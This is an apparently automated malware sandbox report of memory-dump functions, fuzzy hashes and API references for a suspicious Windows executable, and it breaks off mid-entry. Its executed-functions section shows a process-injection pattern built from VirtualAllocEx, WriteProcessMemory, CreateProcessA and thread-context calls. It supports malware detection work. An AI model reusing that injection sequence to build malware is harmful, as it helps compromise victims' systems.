Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87560aa7246a62d696aa29b53802878bf01ff8eda392a68b0a81c350b24ae92e
Instruction ID: 76de85af60ce4c779a0da4ee913f9c312bfd08d4f6a03501c50ef41ffd897fd9
Opcode Fuzzy Hash: 87560aa7246a62d696aa29b53802878bf01ff8eda392a68b0a81c350b24ae92e
Instruction Fuzzy Hash: 9890022124140802D14075588854707500BD7D0701F95C111A4024658EC6168A6567B1

Function 016739B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1563741cf241755e40ae80c784aca885ac3ec0066add83e5703d1d4987d4245
Instruction ID: 113419347780e2b81d1c51d3a333c11b4a9bcae5b3bd111167b71366d4dd7543
Opcode Fuzzy Hash: c1563741cf241755e40ae80c784aca885ac3ec0066add83e5703d1d4987d4245
Instruction Fuzzy Hash: 6490022124545102D150755C4844617900AB7E0301F95C121A4814698EC55589556321

Function 01673D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0099b175294bc6abf4f62aaaf14892b005b0fa0fb84272cc07353414c9d107cd
Instruction ID: bfcd1968f7c1b9439749c9ce1d23a37be334ba389846f0a1970520ac31808115
Opcode Fuzzy Hash: 0099b175294bc6abf4f62aaaf14892b005b0fa0fb84272cc07353414c9d107cd
Instruction Fuzzy Hash: 9C90023520140402D51075585C44647504B97D0301F95D511A442465CEC65489A1A221

Function 01673D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6594af3809aaa575dbe4eaf15b2ef74e83d841bd201a1e32b059ed61b438454
Instruction ID: 33a3b9229b221c429f5b0adb5fa5c57abe895b9fc1e3d2bee5efd0ca96124b8c
Opcode Fuzzy Hash: e6594af3809aaa575dbe4eaf15b2ef74e83d841bd201a1e32b059ed61b438454
Instruction Fuzzy Hash: 5290023120240142954076585C44A4F910A97E1302BD5D515A4015658DC91489615321

Function 01672C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: f964f8ecaa444ff9580cb0a20d828d8a3c9c042a0feaba01db0fb43473a962cf
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01672890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0167293C
___swprintf_l.LIBCMT ref: 0167295E
___swprintf_l.LIBCMT ref: 016729A3
___swprintf_l.LIBCMT ref: 016AA52E

Strings

:%u.%u.%u.%u, xrefs: 016AA5B8
::ffff:0:%u.%u.%u.%u, xrefs: 016AA54E
ffff:, xrefs: 016AA504
::%hs%u.%u.%u.%u, xrefs: 016AA527

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: c40539e092813e65167b4777f34f7fcbe6f0a0657a55a0b2c9cf779889b1fc0f
Instruction ID: 1d096a4c89a9d4909213187ff3ae3122c4fbd87f756b43db9fd17eaebb01560a
Opcode Fuzzy Hash: c40539e092813e65167b4777f34f7fcbe6f0a0657a55a0b2c9cf779889b1fc0f
Instruction Fuzzy Hash: A251D5B6A00116AFDB11DF9D8CA097EFBB8BB08240B54826EE4A5D7741D334DE45CBA4

Function 016E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016E24A6
___swprintf_l.LIBCMT ref: 016E24E2
___swprintf_l.LIBCMT ref: 016E257D
___swprintf_l.LIBCMT ref: 016E25A3
___swprintf_l.LIBCMT ref: 016E25C8
___swprintf_l.LIBCMT ref: 016E2608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 016E24DA
::%hs%u.%u.%u.%u, xrefs: 016E249E
ffff:, xrefs: 016E247D, 016E249D
:%u.%u.%u.%u, xrefs: 016E25FF

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 3d5469099336fe431a67f996e9fd7c7202728a030f62232e9864182dc9c0545f
Instruction ID: dea8c3f6ba1557017e3f6985aa5e390e95d6b02686b50bf361817b270577f4fd
Opcode Fuzzy Hash: 3d5469099336fe431a67f996e9fd7c7202728a030f62232e9864182dc9c0545f
Instruction Fuzzy Hash: 2051F671A01655AECB30DF5CCDA497FBBFEEB48200B048A5DE596C7741E7B4EA408B60

Function 01667630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 016A4787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 016A4725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 016A4655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016A46FC
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 016A4742
Execute=1, xrefs: 016A4713
ExecuteOptions, xrefs: 016A46A0

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 4a0417b8f1a7fa76e1cca5fbcb6f2bede953ab4ebbff2832b131d2800855011e
Instruction ID: 0cbecb896c0121040c59d9b24075cc206b698afd84c68e885751940889092baf
Opcode Fuzzy Hash: 4a0417b8f1a7fa76e1cca5fbcb6f2bede953ab4ebbff2832b131d2800855011e
Instruction Fuzzy Hash: B2513A316002197AEF21ABA9DC85FBE7BADEF15308F4800ADD605E7291EB719E418F54

Function 0167B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0167B6BF

Strings

0, xrefs: 0167B695
-, xrefs: 0167B650
0, xrefs: 0167B66F
+, xrefs: 0167B65A

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 594b93f204c5c02190634ab92ec5094c060f326ed68416cd4f9b0d894cf1b2af
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 4D81BE70E052599EEF29CE6CCC917FEBBB2AF45320F1C421AE961A7391C7349841CB65

Function 016E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016E214F
___swprintf_l.LIBCMT ref: 016E2172

Strings

[, xrefs: 016E212B
]:%u, xrefs: 016E2169
%%%u, xrefs: 016E2146

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: dd67b1a474283c110acb87eed11169fbb80be38e8a5a3d8b84ba28ac01f2ef2a
Instruction ID: 3f07eb93475db4ff27151fb356d21707dcfe0971d89e3efba7efb0272cc4e702
Opcode Fuzzy Hash: dd67b1a474283c110acb87eed11169fbb80be38e8a5a3d8b84ba28ac01f2ef2a
Instruction Fuzzy Hash: A621657AA01119ABDB10DF79CC54AFE7BFEEF54651F04021EEA05E3200E730DA158BA1

Function 0165F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016A02E7
RTL: Re-Waiting, xrefs: 016A031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016A02BD

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: c7f9ca1844579dd2cbda40f3d5196bf9894a7200562966874bcc9677d23ab7b3
Instruction ID: ba68afeb5ec485a74deb970ec9fea65cadf0f9c4029dff9bec52f6c991b99ec8
Opcode Fuzzy Hash: c7f9ca1844579dd2cbda40f3d5196bf9894a7200562966874bcc9677d23ab7b3
Instruction Fuzzy Hash: DCE1CE306047429FD765CF28CC84B2ABBE1BB88314F144AADF9A58B3E1D774E945CB52

Function 0166BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 016A7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 016A7B7F
RTL: Re-Waiting, xrefs: 016A7BAC

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: cd0b199f4c5a9c528bc22aec3397cffab2342101fe211ed93ff915b78e0b3d01
Instruction ID: 94e9ea171d3a4ea76b36c75e869ea9becc47574ddf8bd923f7f96c9b6add0603
Opcode Fuzzy Hash: cd0b199f4c5a9c528bc22aec3397cffab2342101fe211ed93ff915b78e0b3d01
Instruction Fuzzy Hash: 3A41E2313007029FD725DE2DCC40B6AB7EAEF98710F100A2DE956DB790DB72E8058B95

Function 0166B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016A728C

Strings

RTL: Resource at %p, xrefs: 016A72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 016A7294
RTL: Re-Waiting, xrefs: 016A72C1

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 20302db1ae188887666e34499ad91442adc66f4fd57e03c72a3bbbb839b9073e
Instruction ID: 2f47845f2ac00a4568eaffd5558c7033581878f9ee6f6a29a1e78e63af276c61
Opcode Fuzzy Hash: 20302db1ae188887666e34499ad91442adc66f4fd57e03c72a3bbbb839b9073e
Instruction Fuzzy Hash: 9041D031701606ABD721DE29CC41B6ABBAAFF94710F14862DF955EB340DB31F8428BD5

Function 016E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016E238D
___swprintf_l.LIBCMT ref: 016E23B3

Strings

%%%u, xrefs: 016E2384
]:%u, xrefs: 016E23AA

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 33dbbcc057d57bbd7ee664438bb9fe1b8fe9f3439de2a3edcdd4c3f3ae6e2cf1
Instruction ID: 31d613d151064c6c1ddab185c97a20c1c534cc4a1bfe41b9a60699aa5222d805
Opcode Fuzzy Hash: 33dbbcc057d57bbd7ee664438bb9fe1b8fe9f3439de2a3edcdd4c3f3ae6e2cf1
Instruction Fuzzy Hash: D1318272A016199FDB20DE2DCC54BEEB7FDEB44610F44465EE949E3200EB30AA458FA0

Function 01677D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01677E8B

Strings

-, xrefs: 01677DDD
+, xrefs: 01677DE8

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: b2d3fa54562718df6e3e32fd6bc97652ec0aa61de9dd2fee2a18445b739e0491
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: C491A171E0020A9BEB24DF6DCD88ABEBBA5EF44320F14461AE955E73C0D7349D41CB61

Function 01639126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 01639191
@, xrefs: 01639175

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: be027be2393cb73082fd8f48858574517e1e2a5b520c3b88f1ae69ca877edc40
Instruction ID: 84235301f3689de33a8ac26e5df1fca43417daee62713d3fef6f8ac8ace3681f
Opcode Fuzzy Hash: be027be2393cb73082fd8f48858574517e1e2a5b520c3b88f1ae69ca877edc40
Instruction Fuzzy Hash: C1811B76D002699BDB31CF54CC54BEAB7B8AF48714F0441DAEA19B7280D7709E85CFA4

Function 016BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 016BCFBD

Strings

@4Cw@4Cw, xrefs: 016BCFD5, 016BCFDA, 016BCFF1
@, xrefs: 016BCF0A

Memory Dump Source

Source File: 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1600000_8SxJ9aYfJ1.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: 4306b3258b9942aaf906901ac9de265c8e077a9c15e8f305bcf685b688fb5aae
Instruction ID: 62cf823783a60c1cb4385a6b4d6bc84d195cd3a311f958328e481608ec282eb3
Opcode Fuzzy Hash: 4306b3258b9942aaf906901ac9de265c8e077a9c15e8f305bcf685b688fb5aae
Instruction Fuzzy Hash: 0F41D075900225DFDB219FA9CC80AAEBBB9FF58B14F00406EEA01DB350D734D942CB64

Analysis Process: TwkYThKVQVaYn.exePID: 3552, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.6%
Total number of Nodes:	306
Total number of Limit Nodes:	12

Executed Functions

Function 06E17631 Relevance: 3.1, APIs: 2, Instructions: 101
memoryinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E175E6
WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E176C8

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: AllocMemoryProcessVirtualWrite
String ID:
API String ID: 645232735-0
Opcode ID: cf8f8cb898a41a19dcf838e70a803e3ddccd1f3e148bb2a106ac73dfc72d17b8
Instruction ID: 472fb1edc43ddcd53e58f9f4b62abeca3afb59f9b5a672685d209b211037279c
Opcode Fuzzy Hash: cf8f8cb898a41a19dcf838e70a803e3ddccd1f3e148bb2a106ac73dfc72d17b8
Instruction Fuzzy Hash: 2D413272800349DFDF10DFA9C841BDEBBF5AF88310F10882AE519AB250C7799954DBA0

Function 05404560 Relevance: 2.6, Instructions: 2604COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7a5074b8ec564cf6da5b758b5fbd6c9a2e9726bfb5f5c53d750a2106f561b8
Instruction ID: 039483c9d090e43c4ae227ff56b5f078c601424119a346a1563e14f8834a0d0d
Opcode Fuzzy Hash: 4f7a5074b8ec564cf6da5b758b5fbd6c9a2e9726bfb5f5c53d750a2106f561b8
Instruction Fuzzy Hash: CA43C974A002198FDB24DF28C988ADDB7B2BF49310F2591E5E519AB3A5DB30ED91CF40

Function 06E178B5 Relevance: 1.7, APIs: 1, Instructions: 244
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E17AF6

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 148705f5d23a944956bb64ed482b8fe58f0d73649bb364a0c4bd5f1e9bd0fb35
Instruction ID: 047c33b0de5a1533eb6cb7f963372658fbefc7ddba32a2ecc86375b45067f765
Opcode Fuzzy Hash: 148705f5d23a944956bb64ed482b8fe58f0d73649bb364a0c4bd5f1e9bd0fb35
Instruction Fuzzy Hash: C3916771D00319CFEF60CF68C841BEEBAB2BF48704F1485A9E859AB240DB759985CF91

Function 06E178C0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E17AF6

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 276ef1e07548cda9f8e2a00cdae206cfc1c2ff5d852c6df13f07106737cc09e8
Instruction ID: f4c7f25461dab6ace061ac880cc0a59b7bab18eaad986524991014795a37c1fa
Opcode Fuzzy Hash: 276ef1e07548cda9f8e2a00cdae206cfc1c2ff5d852c6df13f07106737cc09e8
Instruction Fuzzy Hash: C6916871D00319CFEF60CF68C841BEEBBB2AF48704F1485A9E848AB240DB759985DF91

Function 026CAD48 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 026CAF9E

Memory Dump Source

Source File: 0000000B.00000002.2276258072.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26c0000_TwkYThKVQVaYn.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8e27e7d1152944ea219263f0fec9ee17d0ba1927e02f06d71edf7b442ae2ff4f
Instruction ID: 4dff0a01f45ffacca57761c00fed0b4bc0dec167f984f3b551d22d342ed02477
Opcode Fuzzy Hash: 8e27e7d1152944ea219263f0fec9ee17d0ba1927e02f06d71edf7b442ae2ff4f
Instruction Fuzzy Hash: CE7113B0A00B098FD724EF6AD45476ABBF2FB88314F10892DD48A97B50DB35E845CBD1

Function 04E418E5 Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E41A02

Memory Dump Source

Source File: 0000000B.00000002.2331172920.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_TwkYThKVQVaYn.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 93c4bf58916e2191e9b23ca4b66fa2dbe5ac046971174bb9e861be001875f53e
Instruction ID: 5498985ac8e141ff6d7c007245e45a5af265f1d7a78a4837f2293c128eab80fb
Opcode Fuzzy Hash: 93c4bf58916e2191e9b23ca4b66fa2dbe5ac046971174bb9e861be001875f53e
Instruction Fuzzy Hash: 3351CDB1D00249DFDF14CF99D884ADDFBB6BF88350F24822AE418AB250D774A985CF90

Function 04E418F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E41A02

Memory Dump Source

Source File: 0000000B.00000002.2331172920.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_TwkYThKVQVaYn.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 722f8f41546c34d78a2d2fe7ecc39f3b4fd3b3ad40408cd2af1a73f76dc15570
Instruction ID: bee1dabe8b9e0fa189e8d47f8829fec99a55fd00f85acd41d270d4abba9cf96a
Opcode Fuzzy Hash: 722f8f41546c34d78a2d2fe7ecc39f3b4fd3b3ad40408cd2af1a73f76dc15570
Instruction Fuzzy Hash: 0C41AFB1D102499FDF14CF99D884ADEBBB5BF88350F24812AE418AB250D774A985CF90

Function 026C44D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 026C59A9

Memory Dump Source

Source File: 0000000B.00000002.2276258072.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26c0000_TwkYThKVQVaYn.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d71d1eb3a7b5b02d358682545fd38f5861804993f6254a7ea4b9c5cb65ad2236
Instruction ID: 43e432336233cdbc155dd7e20cd534ac7c196074d9c6e6e299e815359cadd7e7
Opcode Fuzzy Hash: d71d1eb3a7b5b02d358682545fd38f5861804993f6254a7ea4b9c5cb65ad2236
Instruction Fuzzy Hash: E841EF70C0071DCBEB24DFAAC844B9EBBB5FF89704F20806AD459AB251DB716949CF91

Function 026C58EC Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 026C59A9

Memory Dump Source

Source File: 0000000B.00000002.2276258072.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26c0000_TwkYThKVQVaYn.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c0f0da1c3bd85c4082cfae959cf396f2a6011ff94d75056e552ed971149d7193
Instruction ID: 16b87e6fdcd2296ffe39b3212335f95623fd486f738b1c9034fc2994a1005b47
Opcode Fuzzy Hash: c0f0da1c3bd85c4082cfae959cf396f2a6011ff94d75056e552ed971149d7193
Instruction Fuzzy Hash: A341E0B0C00719CBEB14DFAAC88479DBBB5FF89304F20806AD459AB251DB756949CF91

Function 04E44050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04E44111

Memory Dump Source

Source File: 0000000B.00000002.2331172920.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_TwkYThKVQVaYn.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: aff1fbd06ed19e4994a08bdbbd7e7c1b6964bdbff31e023be1adb0f0999d84af
Instruction ID: d6014926200e9c82ff29a23a027870e290b48f905adcf5c67abc6fb69f965e24
Opcode Fuzzy Hash: aff1fbd06ed19e4994a08bdbbd7e7c1b6964bdbff31e023be1adb0f0999d84af
Instruction Fuzzy Hash: 394157B8A00309DFDB14CF89D448BAABBF5FB88314F24C549D419AB361D374A841CFA1

Function 06E17638 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E176C8

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e10000_TwkYThKVQVaYn.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 45cd9d52b1c345925638d5920705c8535bded2b2aad2a9c1ef33491e406fa821
Instruction ID: a8f3042415e74239cef4e68364c54d4aebeaccdd4215321415ba4ea0846ec5b9
Opcode Fuzzy Hash: 45cd9d52b1c345925638d5920705c8535bded2b2aad2a9c1ef33491e406fa821
Instruction Fuzzy Hash: 4D2113719103499FDF10CFAAC881BEEBBF5FF48710F10842AE959A7240D7789944CBA4

Function 06E17061 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E170E6

Memory Dump Source

Source File: 0000000B.00000002.2332434552.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

